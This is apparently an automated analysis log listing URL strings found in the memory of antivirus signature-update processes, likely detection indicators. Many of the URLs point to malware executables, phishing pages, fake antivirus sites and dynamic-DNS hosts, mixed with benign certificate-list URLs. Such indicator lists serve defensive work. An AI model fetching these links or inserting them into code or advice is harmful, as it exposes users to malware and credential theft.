Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://costacars.es/ico/ortodox.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://count.e-jok.cn/count.txt
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://countdutycall.info/1/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://countexchange.com/config/line.gif
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://cpr-foundation.org/library/reportdhlnew.php
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://cpr-foundation.org/reportmaersknew.php
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: http://cprvstd4upcomingtalentanimationauditnyc.duckdns.org/receipt/invoice_112229.doc
Source: MpSigStub.exe, 0000000B.00000003.18320877082.0000021B5E3DA000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cpvfeed.mediatraffic.com/feed.php?ac=%s&kw=%s&url=%s&ip=%s&rfo=xml
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://cr-installer-fallback.s3-us-west-2.amazonaws.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 0000000B.00000003.18320877082.0000021B5E3DA000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://crl.defence.gov.au/pki0
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://cs-skiluj.sanfre.eu/vmjz848148/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://cs.zhongsou.com/
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://csgo-run.xyz/dl.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cts.hotbar.com/
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://cts.hotbar.com/trackedevent.aspx
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://cvfanatic.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://d.20apoaf.com/xuiow/
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://d.ackng.com/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://d.gameplaylabs.com/ce9237be57719933386c8a88b67bf7a5/install.xml?pid=
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://d.robints.us/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://d.sogou.com/music.so?query=%s
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://d.xmapps.net/i.php
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://d1.downxia.net/products/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://d1hxtl9znqwejj.cloud
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://d2hrpnfyb3wv3k.cloudfront.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://d2xpmajse0mo96.cloudfront.net/app/ver/ssl.php
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp String found in binary or memory: http://dafshare-org.eu.paccar.com
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://dailypictur.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18300431925.0000021B5E6BC000.00000004.00000001.sdmp String found in binary or memory: http://data.webwatcherdata.com/v51/ClientService.asmxx
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://dating2u.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingaction.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingbank.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingexplorer.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingfavorite.com
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingfavorite.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingfirst.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datinggallery.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datinggate.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingleader.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingmachine.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingvirtual.net
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://default.home
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://demo.dokeos.com/courses/ERIC/work/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://dev.northzone.it/ds/2312.gif
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://df20.dot5hosting.com/~shitshir
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dialin.bunm.de/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://dl.%s/get/?pin=%s&lnd=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dl.360safe.com/gf/360ini.cab
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: mpam-728dfe11.exe, 00000011.00000003.18581318930.0000027770032000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest
Source: mpam-728dfe11.exe, 00000011.00000003.18581318930.0000027770032000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/KYSTBANEN.exe
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/Telefoncomputernes9.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://down.anhuiry.com/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com%s&u=%u&advid=00000000&p=%u
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/
Source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/124.php?&advid=00000
Source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/madownload.php?&advid=00000000&u=%u&p=%u&lang=______
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://download.3721.com/download/CnsMinExM.ini
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://download.3721.com/download/CnsMinUp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://download.contextplus.net/shared/Msvcp60Installer.exe
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://download.cpudln.com
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp String found in binary or memory: http://download.driverupdate.net/DriverUpdate-setup.msi.bz2x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://download.enet.com.cn/search.php?keyword=%s
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://download.kaobeitu.com/kaobeitu/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://download.phpnuke.org/installers/extra_software/coupish/coupish-x
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://download.pjplayer.com/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://download.powercreator
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://download.seznam.cz/update
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://download.softobase.com/ru/
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://download.softobase.com/ru/xL
Source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp String found in binary or memory: http://download.spy-shredder.com/ssdownload.php?&advid=00001322&u=%u&p=%u&lang=________&vs=%u&%s
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/Dnl/T_
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/Tb
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/dnl/T
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/cdsearch/
Source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/msstat/dealip.asp?aa=%s&bb=%s&cc=%s&dd=%s&ee=%d&ff=%ld&gg=%
Source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/routeway/dealsetup.asp?aa=%s&bb=%s&cc=%s&dd=%s
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://download.zjsyawqj.cn/jjbq/setup_jjbq_jjbq03nodkpk_v1.0_silent.exe
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://download1.ihyip.pw/
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://download1.microliteupdate.net/
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://download2.mybrowserbar.com/kits/hlp/exthelper.exe
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://downloader.aldtop.com
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://downloadfile.xyz/mine/run.js
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/allfile.jpg
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index2.php?adv=141
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index3.php?adv=141
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index4.php?adv=141
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index5.php?adv=141
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://downloads.180solutions.com/
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp String found in binary or memory: http://downza.cn
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dreple.com/download.php
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://drm.ysbweb.com/v1.aspx?id=65181__asf_license_url_ends_here__
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://dtrack.secdls.com
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://dudethisishowwedoitallnightlong.2myip.net
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://dvd2ipad.net/media2
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://dw.mtsou.com/
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://dw.mtsou.com/_
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dx.mastacash.com
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://dxcodec.com/uninstall/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://dz-site.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://economycrown.com/hahdhdhd/sf-express.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://eda.ru/data
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://elsword.com/xb
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://employeeportal.net-login.com/
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://en.aa.com
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://en.eazel.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://en.v9.com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: http://endresactuarial.com/
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp String found in binary or memory: http://engine.dmccint.com/common/ProcessDump.exe?v=1.0.3.0x
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://ermi.co.zw/ds/2312.gif
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://errors.crossrider.com/utility.gif
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapperxk
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://errors.statsmyapp.comxa
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://esiglass.it/glassclass/glass.php
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://esp1k.myddns.me/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://estelaraziel.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://etzhb.000webhostapp.com/read.txt
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://eula.mindspark.com
Source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp String found in binary or memory: http://eula.mindspark.com/eula/
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://evanstechnology.com
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://events.bittorrent.com/startConversion
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://everbot.pl/cs/reg.php?id=
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://exe-1.icu/install2.exe
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://expandingdelegation.top/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://explorehere.in/info/new-invoice-
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://f0570495.xsph.ru/files/pdf.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://f1visa.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://facebegen.com/dexport/ajax.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://faithhotelghana.com
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://fantastico.globo.com/jornalismo/fant/
